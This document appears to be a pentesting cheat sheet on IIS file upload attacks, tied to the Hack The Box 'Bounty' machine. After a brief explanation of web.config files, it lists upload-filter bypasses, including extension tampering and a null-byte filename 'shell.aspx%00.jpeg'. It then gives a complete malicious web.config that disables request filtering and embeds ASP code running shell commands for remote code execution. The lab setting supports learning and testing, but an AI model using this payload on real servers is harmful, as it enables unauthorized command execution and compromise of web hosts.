IIS Server File Upload

Developers can make directory-specific configurations or IIS servers using a web.config file.

staticContent mimeMap fileExtension=".json" mimeType="application/json" /staticContent

Web Config file

A web.config file lets you customize the way your site or a specific directory on your site behaves. For example, if you place a web.config file in your root directory, it will affect your entire site. If you place it in a /content directory, it will only affect that directory.

With a web.config file, you can control:

• Database connection strings.

• Error behavior.

• Security.

web.config files are XML documents.

.config is not an extension like .html or .txt

Checklists

Try uploading a file with .aspx or .asp extension

If it doesn't work then tamper the extensions using .jpeg or .png

Then try to insert a %00 (NULL byte) => shell.aspx%00.jpeg

Bounty HTB IIS File Upload

We could insert our aspx code in the end of our .config file.

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
<appSettings>
</appSettings>
</configuration>
									// Our Actual aspx code starts from here
<!–-
<% Response.write("-"&"->")
Response.write("<pre>")
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("whoami")			// Executes shell commands
output1 = cmd1.StdOut.Readall()
set cmd1 = nothing: Set wShell1 = nothing
Response.write(output1)
Response.write("</pre><!-"&"-") %>
-->

This is an another way to trigger our exploit and get a RCE